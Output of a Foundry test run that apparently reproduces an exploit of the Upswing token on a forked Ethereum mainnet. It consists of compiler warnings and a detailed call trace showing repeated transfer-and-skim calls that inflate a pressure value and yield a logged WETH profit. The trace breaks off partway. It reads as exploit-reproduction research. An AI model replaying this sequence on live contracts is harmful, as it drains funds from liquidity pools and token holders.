Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.48s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 886.91ms (2.05ms CPU time)

Ran 1 test for src/test/2023-01/Upswing_exp.sol:UpswingExploit
[PASS] testExploit() (gas: 837520)
Logs:
  prev preassure 0
  after fake swaps preassure 66864399287313047715701
  profit! 322242954213069242
  After exploiting, Attacker WETH Balance: 0.322242954213069242

Traces:
  [12277] UpswingExploit::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 16433820 [1.643e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(uniRouterV2: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], "uniRouterV2")
    │   └─ ← [Return]
    ├─ [0] VM::label(upsToken: [0x35a254223960c18B69C0526c46B013D022E93902], "upsToken")
    │   └─ ← [Return]
    ├─ [0] VM::label(weth: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], "weth")
    │   └─ ← [Return]
    └─ ← [Stop]

  [1052166] UpswingExploit::testExploit()
    ├─ [2534] weth::balanceOf(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [534] weth::balanceOf(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(weth: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2])
    │   └─ ← [Return] [0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c], []
    ├─ [0] VM::load(weth: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: weth: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], slot: 13407199363679635973052879518465057167389910613330280238043615909335847287356 [1.34e76])
    ├─ [0] VM::load(weth: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [534] weth::balanceOf(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(weth: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [534] weth::balanceOf(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(weth: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: weth: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 13407199363679635973052879518465057167389910613330280238043615909335847287356 [1.34e76])
    ├─ [0] VM::load(weth: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(weth: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000)
    │   └─ ← [Return]
    ├─ [534] weth::balanceOf(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 1000000000000000000 [1e18]
    ├─ [24420] weth::approve(uniRouterV2: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: uniRouterV2: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x466c74776b1cb1a6f02cc765a14cd3bfd6607c3d7fcc2476c94e5bc071e25f00: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [90598] uniRouterV2::swapExactTokensForTokens(1000000000000000000 [1e18], 0, [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x35a254223960c18B69C0526c46B013D022E93902], UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1674046451 [1.674e9])
    │   ├─ [2504] 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34::getReserves() [staticcall]
    │   │   └─ ← [Return] 273580088706112789921010 [2.735e23], 370977028350625716 [3.709e17], 1609039652 [1.609e9]
    │   ├─ [8225] weth::transferFrom(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, 1000000000000000000 [1e18])
    │   │   ├─ emit Transfer(from: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, value: 1000000000000000000 [1e18])
    │   │   ├─  storage changes:
    │   │   │   @ 0x4109765a2d44b528e2b6e456785738511b028f0ac6075cbbb414cc024cb82fa7: 0x0000000000000000000000000000000000000000000000000525f9a44aab47b4 → 0x0000000000000000000000000000000000000000000000001306b057f20f47b4
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000000de0b6b3a7640000 → 0
    │   │   └─ ← [Return] true
    │   ├─ [69550] 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34::swap(199388836791259039979218 [1.993e23], 0, UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [34652] upsToken::transfer(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 199388836791259039979218 [1.993e23])
    │   │   │   ├─ emit Transfer(from: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 199388836791259039979218 [1.993e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x5a2634c4f1158c1e1654233fa83c23651fa907233ddebc8f12f7b473b5282fd7: 0x0000000000000000000000000000000000000000000039eece6b64c6fd6fbcf2 → 0x000000000000000000000000000000000000000000000fb5ea738675c944e620
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2
    │   │   │   └─ ← [Return] true
    │   │   ├─ [541] upsToken::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   │   └─ ← [Return] 74191251914853749941792 [7.419e22]
    │   │   ├─ [534] weth::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   │   └─ ← [Return] 1370977028350625716 [1.37e18]
    │   │   ├─ emit Sync(reserve0: 74191251914853749941792 [7.419e22], reserve1: 1370977028350625716 [1.37e18])
    │   │   ├─ emit Swap(sender: uniRouterV2: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], amount0In: 0, amount1In: 1000000000000000000 [1e18], amount0Out: 199388836791259039979218 [1.993e23], amount1Out: 0, to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 9: 0x00000000000000000000000000000000032b327e503b4bf4b01bff8e872dd77a → 0x00000000000000000000000000000000038358d75e9c55e645f503f4e9e8ace9
    │   │   │   @ 8: 0x5fe7ff240000000000000525f9a44aab47b40000000039eece6b64c6fd6fbcf2 → 0x63c7ebf30000000000001306b057f20f47b4000000000fb5ea738675c944e620
    │   │   │   @ 10: 0x000000000000000000000000005b681c8ed0b27fcfed5bf3f95c561657d257a8 → 0x0000000000000000000000002bf54311a5b30e32c506079805b55cbebfa1645e
    │   │   └─ ← [Stop]
    │   └─ ← [Return] [1000000000000000000 [1e18], 199388836791259039979218 [1.993e23]]
    ├─ [6483] upsToken::myPressure(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] console::log("prev preassure", 0) [staticcall]
    │   └─ ← [Stop]
    ├─ [541] upsToken::balanceOf(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 199388836791259039979218 [1.993e23]
    ├─ [47385] upsToken::transfer(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, 199388836791259039979218 [1.993e23])
    │   ├─ emit Transfer(from: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, value: 91718864923979158390440 [9.171e22])
    │   ├─  storage changes:
    │   │   @ 0x0c629eb3c393d1a1823b74e4cc59232613764e287af71969da751500735b5f5d: 0 → 0x00000000000000000000000000000000000000000000136c16f204fc64cc06a8
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2 → 0
    │   │   @ 0x577503ff3bb2b9f068eba56b7e87365512d0bfb917f361765180fd6fc1c8d3af: 0 → 1
    │   │   @ 0x5a2634c4f1158c1e1654233fa83c23651fa907233ddebc8f12f7b473b5282fd7: 0x000000000000000000000000000000000000000000000fb5ea738675c944e620 → 0x0000000000000000000000000000000000000000000039eece6b64c6fd6fbcf2
    │   └─ ← [Return] true
    ├─ [37848] 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34::skim(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [541] upsToken::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   └─ ← [Return] 273580088706112789921010 [2.735e23]
    │   ├─ [26652] upsToken::transfer(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 199388836791259039979218 [1.993e23])
    │   │   ├─ emit Transfer(from: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 199388836791259039979218 [1.993e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5a2634c4f1158c1e1654233fa83c23651fa907233ddebc8f12f7b473b5282fd7: 0x0000000000000000000000000000000000000000000039eece6b64c6fd6fbcf2 → 0x000000000000000000000000000000000000000000000fb5ea738675c944e620
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2
    │   │   └─ ← [Return] true
    │   ├─ [534] weth::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   └─ ← [Return] 1370977028350625716 [1.37e18]
    │   ├─ [3262] weth::transfer(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   ├─ emit Transfer(from: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2
    │   └─ ← [Stop]
    ├─ [5585] upsToken::transfer(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, 199388836791259039979218 [1.993e23])
    │   ├─ emit Transfer(from: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, value: 36687545969591663356176 [3.668e22])
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2 → 0
    │   │   @ 0x577503ff3bb2b9f068eba56b7e87365512d0bfb917f361765180fd6fc1c8d3af: 1 → 2
    │   │   @ 0x0c629eb3c393d1a1823b74e4cc59232613764e287af71969da751500735b5f5d: 0x00000000000000000000000000000000000000000000136c16f204fc64cc06a8 → 0x000000000000000000000000000000000000000000001b30ecec6d6159ea6fb8
    │   │   @ 0x5a2634c4f1158c1e1654233fa83c23651fa907233ddebc8f12f7b473b5282fd7: 0x000000000000000000000000000000000000000000000fb5ea738675c944e620 → 0x0000000000000000000000000000000000000000000039eece6b64c6fd6fbcf2
    │   └─ ← [Return] true
    ├─ [37848] 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34::skim(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [541] upsToken::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   └─ ← [Return] 273580088706112789921010 [2.735e23]
    │   ├─ [26652] upsToken::transfer(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 199388836791259039979218 [1.993e23])
    │   │   ├─ emit Transfer(from: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 199388836791259039979218 [1.993e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2
    │   │   │   @ 0x5a2634c4f1158c1e1654233fa83c23651fa907233ddebc8f12f7b473b5282fd7: 0x0000000000000000000000000000000000000000000039eece6b64c6fd6fbcf2 → 0x000000000000000000000000000000000000000000000fb5ea738675c944e620
    │   │   └─ ← [Return] true
    │   ├─ [534] weth::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   └─ ← [Return] 1370977028350625716 [1.37e18]
    │   ├─ [3262] weth::transfer(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   ├─ emit Transfer(from: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2
    │   └─ ← [Stop]
    ├─ [5585] upsToken::transfer(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, 199388836791259039979218 [1.993e23])
    │   ├─ emit Transfer(from: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, value: 18343772984795831678088 [1.834e22])
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2 → 0
    │   │   @ 0x0c629eb3c393d1a1823b74e4cc59232613764e287af71969da751500735b5f5d: 0x000000000000000000000000000000000000000000001b30ecec6d6159ea6fb8 → 0x000000000000000000000000000000000000000000001f1357e9a193d479a440
    │   │   @ 0x5a2634c4f1158c1e1654233fa83c23651fa907233ddebc8f12f7b473b5282fd7: 0x000000000000000000000000000000000000000000000fb5ea738675c944e620 → 0x0000000000000000000000000000000000000000000039eece6b64c6fd6fbcf2
    │   │   @ 0x577503ff3bb2b9f068eba56b7e87365512d0bfb917f361765180fd6fc1c8d3af: 2 → 3
    │   └─ ← [Return] true
    ├─ [37848] 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34::skim(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [541] upsToken::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   └─ ← [Return] 273580088706112789921010 [2.735e23]
    │   ├─ [26652] upsToken::transfer(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 199388836791259039979218 [1.993e23])
    │   │   ├─ emit Transfer(from: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 199388836791259039979218 [1.993e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2
    │   │   │   @ 0x5a2634c4f1158c1e1654233fa83c23651fa907233ddebc8f12f7b473b5282fd7: 0x0000000000000000000000000000000000000000000039eece6b64c6fd6fbcf2 → 0x000000000000000000000000000000000000000000000fb5ea738675c944e620
    │   │   └─ ← [Return] true
    │   ├─ [534] weth::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   └─ ← [Return] 1370977028350625716 [1.37e18]
    │   ├─ [3262] weth::transfer(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   ├─ emit Transfer(from: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2
    │   └─ ← [Stop]
    ├─ [5585] upsToken::transfer(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, 199388836791259039979218 [1.993e23])
    │   ├─ emit Transfer(from: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, value: 10790454685209969411154 [1.079e22])
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2 → 0
    │   │   @ 0x577503ff3bb2b9f068eba56b7e87365512d0bfb917f361765180fd6fc1c8d3af: 3 → 4
    │   │   @ 0x0c629eb3c393d1a1823b74e4cc59232613764e287af71969da751500735b5f5d: 0x000000000000000000000000000000000000000000001f1357e9a193d479a440 → 0x00000000000000000000000000000000000000000000215c4b8d977f2e2b6892
    │   │   @ 0x5a2634c4f1158c1e1654233fa83c23651fa907233ddebc8f12f7b473b5282fd7: 0x000000000000000000000000000000000000000000000fb5ea738675c944e620 → 0x0000000000000000000000000000000000000000000039eece6b64c6fd6fbcf2
    │   └─ ← [Return] true
    ├─ [37848] 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34::skim(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [541] upsToken::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   └─ ← [Return] 273580088706112789921010 [2.735e23]
    │   ├─ [26652] upsToken::transfer(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 199388836791259039979218 [1.993e23])
    │   │   ├─ emit Transfer(from: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 199388836791259039979218 [1.993e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2
    │   │   │   @ 0x5a2634c4f1158c1e1654233fa83c23651fa907233ddebc8f12f7b473b5282fd7: 0x0000000000000000000000000000000000000000000039eece6b64c6fd6fbcf2 → 0x000000000000000000000000000000000000000000000fb5ea738675c944e620
    │   │   └─ ← [Return] true
    │   ├─ [534] weth::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   └─ ← [Return] 1370977028350625716 [1.37e18]
    │   ├─ [3262] weth::transfer(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   ├─ emit Transfer(from: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2
    │   └─ ← [Stop]
    ├─ [5585] upsToken::transfer(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, 199388836791259039979218 [1.993e23])
    │   ├─ emit Transfer(from: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, value: 7055297284973187532311 [7.055e21])
    │   ├─  storage changes:
    │   │   @ 0x5a2634c4f1158c1e1654233fa83c23651fa907233ddebc8f12f7b473b5282fd7: 0x000000000000000000000000000000000000000000000fb5ea738675c944e620 → 0x0000000000000000000000000000000000000000000039eece6b64c6fd6fbcf2
    │   │   @ 0x0c629eb3c393d1a1823b74e4cc59232613764e287af71969da751500735b5f5d: 0x00000000000000000000000000000000000000000000215c4b8d977f2e2b6892 → 0x0000000000000000000000000000000000000000000022dac378c39ce2eeeea9
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2 → 0
    │   │   @ 0x577503ff3bb2b9f068eba56b7e87365512d0bfb917f361765180fd6fc1c8d3af: 4 → 5
    │   └─ ← [Return] true
    ├─ [37848] 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34::skim(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [541] upsToken::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   └─ ← [Return] 273580088706112789921010 [2.735e23]
    │   ├─ [26652] upsToken::transfer(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 199388836791259039979218 [1.993e23])
    │   │   ├─ emit Transfer(from: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 199388836791259039979218 [1.993e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0x5a2634c4f1158c1e1654233fa83c23651fa907233ddebc8f12f7b473b5282fd7: 0x0000000000000000000000000000000000000000000039eece6b64c6fd6fbcf2 → 0x000000000000000000000000000000000000000000000fb5ea738675c944e620
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2
    │   │   └─ ← [Return] true
    │   ├─ [534] weth::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   └─ ← [Return] 1370977028350625716 [1.37e18]
    │   ├─ [3262] weth::transfer(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   ├─ emit Transfer(from: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, to: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2
    │   └─ ← [Stop]
    ├─ [5585] upsToken::transfer(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, 199388836791259039979218 [1.993e23])
    │   ├─ emit Transfer(from: UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34, value: 4957776469443921850861 [4.957e21])
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000002a38e3f7de51342ad6d2 → 0
    │   │   @ 0x577503ff3bb2b9f068eba56b7e87365512d0bfb917f361765180fd6fc1c8d3af: 5 → 6
    │   │   @ 0x5a2634c4f1158c1e1654233fa83c23651fa907233ddebc8f12f7b473b5282fd7: 0x000000000000000000000000000000000000000000000fb5ea738675c944e620 → 0x0000000000000000000000000000000000000000000039eece6b64c6fd6fbcf2
    │   │   @ 0x0c629eb3c393d1a1823b74e4cc59232613764e287af71969da751500735b5f5d: 0x0000000000000000000000000000000000000000000022dac378c39ce2eeeea9 → 0x0000000000000000000000000000000000000000000023e786710b25862b2096
    │   └─ ← [Return] true
    ├─ [37848] 0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34::skim(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─ [541] upsToken::balanceOf(0x0e823a8569CF12C1e7C216d3B8aef64A7fC5FB34) [staticcall]
    │   │   └─ ← [Return] 273580088706112789921010 [2.735e23]
    │   ├─ [26652] upsToken::transfer(UpswingExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 199388836791259039979218 [1.993e23])
